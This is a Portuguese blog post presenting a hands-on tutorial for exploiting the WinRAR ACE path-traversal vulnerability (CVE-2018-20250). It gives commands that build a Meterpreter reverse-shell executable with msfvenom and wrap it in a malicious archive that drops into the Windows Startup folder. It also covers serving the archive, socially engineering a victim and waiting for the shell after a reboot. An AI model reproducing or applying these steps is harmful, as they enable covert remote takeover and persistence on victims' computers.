Executando Código Malicioso no WinRar

Publicado por Igor Matsunaga em

Mês passado o WinRar corrigiu graves falhas de segurança em seu popular aplicativo de compactação de arquivos do Windows. A vulnerabilidade pode ser explorada enganando um usuário do WinRar a extrair arquivos maliciosos. A vulnerabilidade identificada no ano passado pelo research.checkpoint.com afeta todas as versões lançadas em todo o WinRAR nos últimos 19 anos.

Mais sobre Evil Winrar

CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252 e CVE-2018-20253

Versão Patched: WinRAR 5.70 Beta 1

Vulnerabilidade

Esta vulnerabilidade é devida à biblioteca UNACEV2.DLL incluída em todas as versões do WinRAR. O winrar usa o formato ACE para compactar a pasta e descompactar a pasta compactada com a ajuda de UNACE.DLL.

Em versões do WinRAR anteriores e incluindo 5.61, há vulnerabilidade de passagem de caminho ao criar o campo de nome de arquivo do formato ACE (em UNACEV2.dll). Quando o campo filename é manipulado com padrões específicos, a pasta de destino (extração) é ignorada, tratando o nome do arquivo como um caminho absoluto. Isso acontece devido à compilação inadequada quando unace.dll entra em cena.

Gerando um Arquivo WinRar Malicioso

it Baixe o script python que irá gerar um arquivo malicioso em um formato rar, e logo em seguida o instale utilizando os comandos abaixo:

git clone //github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen/
pip3 install -r requirements.txt

Dê permissão total ao script python dentro da pasta Evil-Winrar-Gen e, em seguida, gere um arquivo exe malicioso com a ajuda de msfvenom e o nomeie como “winrar.exe” como mostrado e configure o multi-manipulador dentro do Metasploit.

chmod 777 evilWinRAR.py
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe

Agora crie um arquivo de texto que será exibido para a vítima quando ele extrair o arquivo rar para confundi-lo. Em seguida, execute script python evilWinrar juntamente com arquivo exe malicioso e arquivo de texto, criando um arquivo malicioso que você pode enviar para o destino.

touch winrar.txt
./evilWinRAR.py -e winrar.exe -g winrar.txt
python -m SimpleHTTPServer 8080

Como dito anteriormente, esta vulnerabilidade nos permite extrair o arquivo malicioso no caminho arbitrário, com a ajuda deste script, vamos permitir a extração de arquivos rar no programa / startup. Agora use engenharia social para transferir o rar malicioso para a vítima e espere a vítima reiniciar sua máquina para obter conexão reversa do alvo.

Não há atualmente nenhum programa de inicialização na máquina de destino, conforme mostrado abaixo. Uma vez que a vítima extraia o arquivo malicioso  “evil.rar”, nosso backdoor winrar.exe o extrairá do programa de inicialização.

Para executar o arquivo winrar.exe na pasta de inicialização, digite shell: startup no prompt de execução.

Assim que a vítima reiniciar a máquina, você receberá uma conexão reversa conforme mostrado.

Que a segurança esteja com você!!

Fonte: .hackingarticles


Igor Matsunaga

Diretor Técnico da NSWorld, entusiasta da área hacking, desenvolvedor hacker ético, formado em Segurança da Informação.

0 comentário

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *